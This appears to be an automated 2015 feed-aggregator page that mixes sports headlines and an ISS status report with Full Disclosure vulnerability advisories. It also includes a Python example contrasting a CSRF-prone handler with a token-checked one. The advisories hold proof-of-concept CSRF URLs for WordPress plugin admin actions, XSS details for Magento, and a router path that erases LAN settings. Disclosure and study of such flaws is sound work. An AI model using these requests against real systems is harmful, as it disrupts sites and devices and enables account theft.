Saturday, June 20, 2015

How to create a block for anonymous users to enter their contact info

Hello, I am trying to create a block with the below fields: Name, PhoneNo, Email, Message Anonymous users can enter these info. Then they can click ...

from Google Alert - anonymous http://ift.tt/1RkFqCf
via IFTTT

How do I write an anonymous callback function as a second parameter?

Hey Chris, you have everything right in your actual code. The only reason why the challenge won't pass is that you're missing an ! on the goodbye ...

from Google Alert - anonymous http://ift.tt/1fplClr
via IFTTT

Germany beats Sweden, China ousts Cameroon at WWCup

OTTAWA, Ontario (AP) Germany provided a dominating reminder of why it is deserving of its favorite tag at the Women's World Cup by beating Sweden 4-1 on Saturday to progress to the quarterfinals.

from FOX Sports Digital http://ift.tt/1QJLFEH
via IFTTT

Argentina beats Jamaica to finish 1st in Copa America group

VINA DEL MAR, Chile (AP) Argentina defeated Jamaica 1-0 in Lionel Messi's 100th game with the national team on Saturday, securing first place in its Copa America group.

from FOX Sports Digital http://ift.tt/1LmaVNH
via IFTTT

HR Answers

What resources should a company provide managers to train their employees? By Anonymous. ago. Categories: HSA, Contributions ...

from Google Alert - anonymous http://ift.tt/1Gr8ulE
via IFTTT

Paraguay, Uruguay draw 1-1 and advance to Copa quarters

LA SERENA, Chile (AP) Defending champion Uruguay and Paraguay drew 1-1 in their last group game and both advanced to the Copa America quarterfinals on Saturday.

from FOX Sports Digital http://ift.tt/1Gz8pPX
via IFTTT

Orioles Highlight: Darren O'Day escapes bases-loaded jam in 8th, Manny Machado 2-run double in 9th in win over Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous on Twitter: "Please join #Anomymous in support of Jeremy Hammond and in protest of ...

Signal boost for Anonymous operations, resistance movements, & journalism. #RobertDoggart. Right behind you. youranonnews.tumblr.com ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/611937127933194240&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFxieeZmaCJZCEIF40wkLx3Cb5Iug
via IFTTT

Brazil will appeal Neymar's Copa America suspension

SANTIAGO, Chile (AP) Brazil will appeal Neymar's four-game suspension that rules him out of the rest of the Copa America.

from FOX Sports Digital http://ift.tt/1dVZbDt
via IFTTT

Orioles: RHP Kevin Gausman reinstated from 15-day DL; RHP Mychal Givens up from Triple-A; RHP Jason Garcia on 60-day DL (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Russian minister: Money not in the way of firing Capello

MOSCOW (AP) Money will be no object if Russia decides to fire national football team coach Fabio Capello, despite reports he could be due up to $24 million in compensation, the country's sports minister says.

from FOX Sports Digital http://ift.tt/1L9IeCC
via IFTTT

Urawa Reds win J-League's first-stage title after 1-1 draw

KOBE, Japan (AP) Urawa Reds won the J-League's first-stage title on Saturday after drawing 1-1 at Vissel Kobe.

from FOX Sports Digital http://ift.tt/1K2fL2f
via IFTTT

This Simple Trick Requires Only Your Phone Number to Hack your Email Account

We have all been receiving spam phone calls and messages on an almost daily basis from scammers who want to pilfer your money and personal information, but a new type of social engineering hack that makes use of just your mobile number to trick you is a little scarier. Security firm Symantec is warning people about a new password recovery scam that tricks users into handing over their webmail


from The Hacker News http://ift.tt/1QI7e8K
via IFTTT

Serbia coach hopes for national unity after World Cup win

AUCKLAND, New Zealand (AP) Serbia coach Veljko Paunovic hoped his team's victory at the Under-20 World Cup will help inspire ''compassion and unity'' in a country still troubled by its war-torn past.

from FOX Sports Digital http://ift.tt/1K23bjI
via IFTTT

5G Mobile Networks to Offer Speed Up To 20Gbps

While many of us are battling with slow data access and still awaiting the roll-out of 4G networks, the International Telecommunication Union (ITU) is already looking forward to the next generation of telecommunication network technology. Yes folks, we are talking about the future 5G standard for mobile networking. Since the 5G standard is currently in the definition stage, the ITU has


from The Hacker News http://ift.tt/1RiHE4Z
via IFTTT

Serbia beats Brazil 2-1 in Under-20 World Cup final

AUCKLAND, New Zealand (AP) Nemanja Maksimovic scored in the 117th minute to give Serbia a surprise 2-1 win over Brazil on Saturday in the final of the Under-20 World Cup.

from FOX Sports Digital http://ift.tt/1L8VWpd
via IFTTT

Platini has big decision in great game for FIFA throne

GENEVA (AP) After years of waiting, Michel Platini's destiny with FIFA is coming faster than he thought.

from FOX Sports Digital http://ift.tt/1Cj4lzj
via IFTTT

3rd place: Mali gets 3 late goals, beats Senegal at U20 WCup

AUCKLAND, New Zealand (AP) Mali claimed third place at the Under-20 World Cup with a 3-1 win over 10-man Senegal in a dramatic and foul-ridden match on Saturday.

from FOX Sports Digital http://ift.tt/1QHCV21
via IFTTT

Friday, June 19, 2015

Orioles Video: PH Jimmy Paredes spoils Marco Estrada's no-hit bid with bloop single in 8th in 5-4 loss to Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Brazil's Neymar banned for rest of Copa America

SANTIAGO, Chile (AP) Brazilian star Neymar was banned for the rest of the Copa America on Friday, stripping the tournament of one of its biggest stars.

from FOX Sports Digital http://ift.tt/1NbDrzN
via IFTTT

Chile routs Bolivia to finish 1st in its Copa America group

SANTIAGO, Chile (AP) Charles Aranguiz scored twice and Alexis Sanchez added another goal on Friday to help Copa America host Chile defeat Bolivia 5-0 and advance from the group stage in first place.

from FOX Sports Digital http://ift.tt/1J9fN8m
via IFTTT

[FD] Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: http://ift.tt/1kbcdeO
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 rev @1183563
# Link to code diff: http://ift.tt/1fmTGhZ
# CVE Status: None/Unassigned/Fresh

## Product Information:

Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your template code to begin logging. Google Analyticator also includes several widgets for displaying Analytics data in the admin and on your blog. One of the most popular WordPress plugins for Google Analytics! Over 3.5+ million downloads.

## Vulnerability Description:

The administrative actions allowed by the plugin can be exploited using CSRF which could be used to disrupt the functionality provided by the plugin.

## Proof-of-Concept:

http://localhost/wp-admin/options-general.php?page=google-analyticator.php&pageaction=ga_clear_cache
http://localhost/wp-admin/options-general.php?page=ga_reset

## Solution:

Upgrade to v6.4.9.3 rev @1183563

## Disclosure Timeline:

2015-05-30 - Contacted developer via forums.
2015-06-02 - Vulnerability details submitted on the forums on developer's request - http://ift.tt/1CiBKtU
2015-06-13 - Re-contacted developer on the forums.
2015-06-18 - Update released.
2015-06-19 - Publishing to Full Disclosure mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

Source: Gmail -> IFTTT-> Blogger
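
The pattern behind the two proof-of-concept URLs in the Google Analyticator advisory above, as an added example (not the plugin's code and not the content of the linked diff): an admin action that fires on any authenticated request, next to a handler that requires POST plus a token bound to the session and the action. The token scheme, function names and session IDs are assumptions made for illustration; in WordPress itself the equivalent control is a nonce check.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: a per-install secret used to derive tokens.
SERVER_SECRET = secrets.token_bytes(32)

# The two state-changing actions named in the advisory's PoC URLs.
STATE_CHANGING = {"ga_clear_cache", "ga_reset"}

# PoC URLs exactly as they appear in the advisory.
POC_CLEAR = ("http://localhost/wp-admin/options-general.php"
             "?page=google-analyticator.php&pageaction=ga_clear_cache")
POC_RESET = "http://localhost/wp-admin/options-general.php?page=ga_reset"


def action_from_url(url):
    """Return the state-changing action a URL requests, or None."""
    query = parse_qs(urlsplit(url).query)
    for key in ("pageaction", "page"):
        for value in query.get(key, []):
            if value in STATE_CHANGING:
                return value
    return None


def issue_token(session_id, action):
    """Token tied to one session and one action (hypothetical scheme)."""
    msg = f"{session_id}:{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def handle_vulnerable(method, url, session_id, form=None):
    """CSRF-prone handling: an authenticated session plus the right URL is
    enough, so any page the admin visits can trigger the action."""
    action = action_from_url(url)
    if session_id and action:
        return f"executed {action}"
    return "no-op"


def handle_hardened(method, url, session_id, form=None):
    """Require POST and a valid per-session, per-action token."""
    form = form or {}
    action = action_from_url(url)
    if not session_id or action is None:
        return "no-op"
    if method != "POST":
        return "rejected: state change requires POST"
    supplied = form.get("csrf_token", "").encode()
    expected = issue_token(session_id, action).encode()
    # Constant-time comparison avoids leaking the token byte by byte.
    if not hmac.compare_digest(supplied, expected):
        return "rejected: missing or invalid CSRF token"
    return f"executed {action}"


def demo():
    """Run the forged and the legitimate request through both handlers."""
    session = "admin-session"  # constructed session identifier
    token = issue_token(session, "ga_reset")
    return {
        "vulnerable_forged_get": handle_vulnerable("GET", POC_RESET, session),
        "hardened_forged_get": handle_hardened("GET", POC_RESET, session),
        "hardened_forged_post": handle_hardened("POST", POC_RESET, session, {}),
        "hardened_legit_post": handle_hardened(
            "POST", POC_RESET, session, {"csrf_token": token}),
        "hardened_wrong_action": handle_hardened(
            "POST", POC_CLEAR, session, {"csrf_token": token}),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```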

[FD] IBM Domino Web Server Cross-site Scripting Vulnerability (CVE-2015-1981)

Hello list! Earlier I wrote about an XSS vulnerability in IBM Domino (http://ift.tt/1Jgogoz). I informed IBM about it in May, and on 17.06.2015 they fixed it and released a security bulletin. Security Bulletin: IBM Domino Web Server Cross-site Scripting Vulnerability (CVE-2015-1981) http://ift.tt/1fmTG1J. CVE ID: CVE-2015-1981.

Source: Gmail -> IFTTT-> Blogger

Mexico eliminated from Copa America in 2-1 loss to Ecuador

RANCAGUA, Chile (AP) Mexico was eliminated from the Copa America on Friday with a 2-1 loss to Ecuador in the final Group A match in the Copa America.

from FOX Sports Digital http://ift.tt/1I3NBT2
via IFTTT

Orioles: Adam Jones in lineup as DH, batting 3rd Friday vs. Blue Jays; missed last 3 games with sore right shoulder (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Neymar banned for rest of Copa America for violent conduct

SANTIAGO, Chile (AP) Brazilian star Neymar has been banned for the rest of the Copa America, depriving the tournament of one of its biggest stars.

from FOX Sports Digital http://ift.tt/1Go7P4j
via IFTTT

Ravens: Jamison Hensley on the rookies who could start this season, including WR Breshad Perriman, TE Maxx Williams (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ex-England, Chelsea striker Kerry Dixon jailed for assault

LUTON, England (AP) Former England striker Kerry Dixon has been jailed for nine months after being found guilty of assault.

from FOX Sports Digital http://ift.tt/1d5YbvK
via IFTTT

Aulas ready to spend big to keep Lacazette

LYON, France (AP) Lyon president Jean-Michel Aulas is ready to open his wallet to keep Alexandre Lacazette at the French league runner-up.

from FOX Sports Digital http://ift.tt/1LjHLi8
via IFTTT

Free Encryption Project to issue First SSL/TLS Certificates Next Month

Let's Encrypt, a project that aims to provide a free-of-charge and easier-to-implement way to obtain and use digital cryptographic certificates (SSL/TLS) to secure HTTPS websites, is looking forward to issuing its first digital certificates next month. With Let's Encrypt, any webmaster interested in implementing HTTPS for their services can get the certificates for free, which is a great move for


from The Hacker News http://ift.tt/1I1JyXc
via IFTTT

[FD] Ebay Magento Bug Bounty #12 - Cross Site Request Forgery Web Vulnerability

Document Title:
===============
Ebay Magento Bug Bounty #12 - Cross Site Request Forgery Web Vulnerability

References (Source):
====================
http://ift.tt/1JXH6RJ
Video: http://ift.tt/1IkusYN
View Video: https://www.youtube.com/watch?v=x7uaABfxxU0
EIBBP-31602

Release Date:
=============
2015-06-17

Vulnerability Laboratory ID (VL-ID):
====================================
1460

Common Vulnerability Scoring System:
====================================
2.5

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-17: Researcher Notification & Coordination (Hadji Samir)
2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2015-04-18: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-05-19: Vendor Fix/Patch (Magento Developer Team)
2015-05-21: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-06-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Connect Web Application 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site request forgery vulnerability has been discovered in the official Magento Commerce web-application. The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.

The vulnerability is located in the `create messages` input of the `magento-connect/message/message/create/` module. Remote attackers with low privilege user accounts are able to delete internal magento messages of other users without authorization. The attacker can for example intercept the session to delete all existing messages. The type of issue was disclosed to the phpbb board some years ago.

The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. Exploitation of the vulnerability requires a low privilege web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized delete or add of magento connect service panel messages.

Vulnerable Module(s):
[+] magento-connect/message/message/create/

Proof of Concept (PoC):
=======================
The client-side cross site request forgery web vulnerability can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Login to magento connect
2. Open the send message module
3. Switch to the code review and watch the vulnerable source
4. Follow the steps in the video to recreate the csrf attack! Note: Tamper the session to intercept the url in a browser
5. Successful reproduce of the security vulnerability!

PoC: Vulnerable Source

[FD] Ebay Magento Bug Bounty #10 - Persistent Filename Vulnerability

Document Title:
===============
Ebay Magento Bug Bounty #10 - Persistent Filename Vulnerability

References (Source):
====================
http://ift.tt/1Lhexxk
eBay Inc. Bug Bounty Program ID: EIBBP-31603
Video: https://www.youtube.com/watch?v=WffsHd8pibE

Release Date:
=============
2015-06-16

Vulnerability Laboratory ID (VL-ID):
====================================
1457

Common Vulnerability Scoring System:
====================================
3.7

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official Magento Commerce web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-17: Researcher Notification & Coordination (Hadji Samir)
2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2015-04-07: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-05-21: Vendor Fix/Patch (Magento Developer Team)
2015-06-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Connect Web Application 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Magento xCommerce web-application. The vulnerability allows remote attackers to inject own script code to the application-side of the affected service module.

The vulnerability is located in the `filename` value of the image upload module. The attacker needs to create a `New Message` with upload to change the filename to a malicious payload. The attack vector of the issue is located on the application-side and the request method to inject the script code is POST.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the persistent web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation affected or connected module context.

Vulnerable Domain(s):
[+] http://ift.tt/gRsn9E (Magento Connect)

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] New Message

Vulnerable Parameter(s):
[+] filename

Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...
1. Login to the magento connect service
2. create a new message
3. Start a session tamper to intercept session data - http://ift.tt/1FqWzDn
4. Click to Drop the file and upload it with a payload as filename ">.png
5. Save the request and the execution occurs in the same location!
6. Successful reproduce of the application-side input validation web vulnerability in the upload POST method request!

PoC: magento-connect session GET

PoC video: https://www.youtube.com/watch?v=IXn2BpcFdgs

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 6/18/15

Microgravity Science Glovebox (MSG) Cleanup and Reconfiguration: Kelly completed the second and final MSG cleanup session following the completion of RR2. Following cleanup, Padalka installed the Observation Analysis of Smectic Islands in Space (OASIS) experiment hardware. The sample installation, final connections and camera checkout will be scheduled on another day. OASIS studies the unique behavior of liquid crystals in microgravity, including their overall motion and the merging of crystal layers known as smectic islands. Liquid crystals are used for display screens in televisions and clocks and they also occur in soaps and cell membranes. The experiment allows detailed studies of the behavior of these structures, and how microgravity affects their unique ability to act like both a liquid and a solid crystal.

Ocular Health: Kelly and Kornienko executed their Flight Day 90 Ocular Health activities today including Optical Coherence Tomography (OCT) to measure retinal thickness, volume, and retinal nerve fiber layer and Fundoscope measurements to collect retinal images. For these operations, Padalka assisted Kelly and Kelly was the Crew Medical Officer for Kornienko. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers.

Radiation Dosimetry Inside ISS-Neutrons (RADI-N): Kelly retrieved the eight RADI-N detectors from their deployed locations and handed them over to Kornienko for downlink of the data. The objective of this investigation is to better characterize the ISS neutron environment and define the risk posed to the crewmembers’ health and provide the data necessary to develop advanced protective measures for future space flight.

ISS Reboost: The ISS performed a reboost at 5:59 am CDT today using 58P thrusters. This reboost was added to the timeline as the result of 43S Soyuz launch date moving from July 24 to July 22. A second reboost is planned for July 10 to finalize setup for 43S Soyuz 4-orbit launch. Delta-V was 0.5 meters/second and burn duration was 4 minutes, 8 seconds.

Today’s Planned Activities
All activities were completed unless otherwise noted.

Closing USOS Window Shutters Closure of outer shutters on SM windows 6, 8, 9, 12, 13, 14 for ISS Reboost Optical Coherence Tomography (OCT) Setup Rodent Research (RR) – Hardware Removal and Cleaning Preparations for Replacement of РТ-50-1М No.4 and No.1 (А204, А211). OCT Exam OASIS – Hardware Gathering MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. OASIS – Setup RADIN – Retrieval of dosimeters from deployed locations MATRYOSHKA-R. Receiving BUBBLE-dosimeter detectors from USOS. RADIN – Handover of Dosimeters to the Russian Crew MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Manual synchronization of the time on the CEVIS Control Panel with the LS1 server OCT Exam OCT Equipment Stowage OASIS – Setup СОЖ Maintenance VZAIMODEISTVIYE-2. Experiment Ops Cleaning of TVS LIV voltage converter vent grille VZAIMODEISTVIYE-2. Experiment Ops Fundoscope Setup and OCT Laptop Configuration Ocular Health – Fundoscope Prep IMS Delta File Prep HABIT – iPad S/W Update Fundoscope – Eye Exam Tightening of Progress 425 SM (Aft) QD Screw Clamps Preparing for Fundoscope Exam Fundoscope – Eye Exam Fundoscope Removal and Stowage

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
Ocular Health ops
OASIS hardware setup

Three-Day Look Ahead:
Friday, 06/19: Ocular Health, CUCU/CCP checkout, SPX-7 OBT RoBOT training
Saturday, 06/20: Crew off duty, housekeeping
Sunday, 06/21: Crew off duty

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1ChcsfI
via IFTTT

[FD] Ebay Magento Bug Bounty #17 - Client Side Cross Site Scripting Web Vulnerability

Document Title:
===============
Ebay Magento Bug Bounty #17 - Client Side Cross Site Scripting Web Vulnerability

References (Source):
====================
http://ift.tt/1JXH6RE
EIBBP-31541

Release Date:
=============
2015-06-15

Vulnerability Laboratory ID (VL-ID):
====================================
1473

Common Vulnerability Scoring System:
====================================
3

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-02-20: Researcher Notification & Coordination (Hadji Samir)
2015-02-21: Vendor Notification (Magento Team - Bug Bounty Program)
2015-03-10: Vendor Response/Feedback (Magento Security Team - Bug Bounty Program)
2015-05-12: Vendor Fix/Patch (Magento Developer Team)
2015-06-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Premium Themes 2015 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Magento Commerce Premium Theme front-end web-application. The non-persistent xss vulnerability allows remote attackers to inject own script code to the application-side of the vulnerable online-service module.

The vulnerability is located in the `general_front` values of the `/css/theme.less.php` front-end template file. Remote attackers are able to inject own script codes to client-side application requests. The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable source is located in the magento premium theme and the stable release.

The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the cross site scripting web vulnerability requires no privileged web application user account and no user interaction. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules.
Request Method(s):
[+] GET

Vulnerable Module(s):
[+] css/less

Vulnerable File(s):
[+] theme.less.php

Vulnerable Parameter(s):
[+] general_front

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction(click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC(s):
http://ift.tt/1dO54T7 http://ift.tt/1JZDi3K http://ift.tt/1dO54T9 http://ift.tt/1JZDgZV http://ift.tt/1JZDgZX http://ift.tt/1dO54Tb http://ift.tt/1GCOeCC http://ift.tt/1dO54Tc http://ift.tt/1dO54Tc http://ift.tt/1JZDhgd http://ift.tt/1dO559q http://ift.tt/1dO54Tb http://ift.tt/1JZDhgf http://ift.tt/1dO559s

Solution - Fix & Patch:
=======================
Restrict the input of the general_font value by disallowing the usage of special chars. Encode and parse the vulnerable file parameters to prevent client-side script code injection attacks.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the frontend is estimated as medium. (CVSS 3.0)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability

Document Title:
===============
ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability

References (Source):
====================
http://ift.tt/1GbmO1o

Release Date:
=============
2015-06-16

Vulnerability Laboratory ID (VL-ID):
====================================
1522

Common Vulnerability Scoring System:
====================================
6

Product & Service Introduction:
===============================
ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1)

(Copy of the Vendor Homepage: http://ift.tt/1cWWrCh )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.

Vulnerability Disclosure Timeline:
==================================
2015-06-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
ZTE Corporation
Product: ZTE ZXV10 W300 3.1.0c_DR0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. The security vulnerability allows remote attackers to block/shutdown or delete network settings and components.

The LAN configuration post to /Forms/home_lan_1 and the page /home_lan_1 that stores the configuration of the router. Attackers can request via GET method the /Forms/home_lan_1 path and the modem will delete all the LAN configurations automatically. The problem is the GET method request with the /Forms/home_lan_1 path that deletes all the configurations. A hard reset is required after successful exploitation of the issue.

The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the security web vulnerability requires no privilege web-application user account and low user interaction (click link). Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Forms/

Affected Module(s):
[+] home_lan_1

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce follow the provided information and steps below to continue.

Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

Document Title:
===============
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

References (Source):
====================
http://ift.tt/1SvmNhw

Release Date:
=============
2015-06-19

Vulnerability Laboratory ID (VL-ID):
====================================
1501

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, the service contracts and in the process providing a superior customer experience.

SupportCenter Plus is commonly deployed on internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk staff (typically Active Directory integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is important to consider when evaluating the risk of the below vulnerabilities.

(Copy of the Vendor Homepage: http://ift.tt/1JZDgZK )

Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application.

Vulnerability Disclosure Timeline:
==================================
2015-05-27: Researcher Notification & Coordination (Alain Homewood)
2015-06-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Manage Engine
Product: SupportCenter Plus - Web Application 7.90

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
1.1 Improper authentication disclosing password (Authenticated)

Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessible by Administrators.

This functionality allows a low privilege user to:
